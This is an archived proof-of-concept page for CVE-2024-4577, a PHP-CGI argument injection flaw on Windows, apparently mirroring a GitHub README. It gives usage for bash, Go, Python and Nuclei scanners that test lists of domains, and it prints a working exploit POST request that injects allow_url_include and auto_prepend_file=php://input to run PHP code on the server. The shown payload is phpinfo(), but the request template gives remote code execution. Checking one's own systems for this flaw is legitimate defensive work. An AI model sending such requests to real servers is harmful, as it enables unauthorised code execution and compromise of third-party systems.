Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-4577 PoC — PHP 操作系统命令注入漏洞

Source
https://github.com/ZephrFish/CVE-2024-4577-PHP-RCE
Associated Vulnerability
Title:PHP 操作系统命令注入漏洞 (CVE-2024-4577)
Description:PHP是一种在服务器端执行的脚本语言。 PHP存在操作系统命令注入漏洞,该漏洞源于在特定条件下,Windows系统使用“Best-Fit”行为替换命令行中的字符,这可能导致PHP CGI模块错误地将这些字符解释为PHP选项,从而泄露脚本的源代码,在服务器上运行任意PHP代码等。以下版本受到影响:8.1至8.1.29之前版本,8.3至8.3.8之前版本,8.2至8.2.20之前版本。
Description
PHP RCE PoC for CVE-2024-4577 written in bash, go, python and a nuclei template
Readme
# PHP RCE PoC
## CVE-2024-4577: Argument Injection in PHP-CGI

## Overview

This repository contains scripts to check for the CVE-2024-4577 vulnerability, an argument injection issue in PHP-CGI. You can use the provided Bash, Go, and Python scripts to test a list of domains for this vulnerability. I've also released a Nuclei YAML file.

## Usage

### Bash Script

To use the Bash script, run the following command:

```bash
./CVE-2024-4577.sh /path/to/domains-list
```

### Go Script

First, save the Go script to a file named `CVE-2024-4577.go`. To build and run the Go script:

1. Compile the Go script into a binary:

    ```bash
    go build -o CVE-2024-4577 CVE-2024-4577.go
    ```

2. Execute the binary with the domain list file as an argument:

    ```bash
    ./CVE-2024-4577 /path/to/domains-list
    ```

### Python Script

First, save the Python script to a file named `CVE-2024-4577.py`. To run the Python script:

1. Ensure you have the `requests` library installed:

    ```bash
    pip install requests
    ```

2. Execute the Python script with the domain list file as an argument:

    ```bash
    python CVE-2024-4577.py /path/to/domains-list
    ```

3. (Optional) If you want to only print vulnerable hosts:

    ```bash
    python CVE-2024-4577.py /path/to/domains-list --quiet
    ```


## Proof of Concept (POC) Explained

To manually test for the vulnerability, you can send the following POST request:

```http
POST /test.hello?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: */*
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

<?php phpinfo(); ?>
```

## Nuclei Template
I've also created a Nuclei template to scan for vulnerable instances, it uses the v3 layout scheme and has been tested in a lab environment:
```
nuclei -t CVE-2024-4577.yaml -u <target-url>
```

## Domain List Example
The list of domains should be pre-pended with http/https to ensure they are read correctly.

```
http://example.com
http://testsite.com
http://vulnerablesite.com
```

## Example Output

If a domain is found to be vulnerable, the output will be:

```
http://example.com: Vulnerable
http://vulnerablesite.com: Vulnerable
```
File Snapshot

 [4.0K]  /data/pocs/fb6f7e6b75170f9566ba5f21916f03bdbfb0ca56
├── [2.2K]  CVE-2024-4577.go
├── [1.7K]  CVE-2024-4577.py
├── [1.1K]  CVE-2024-4577.sh
├── [1.0K]  CVE-2024-4577.yaml
└── [2.3K]  README.md

0 directories, 5 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.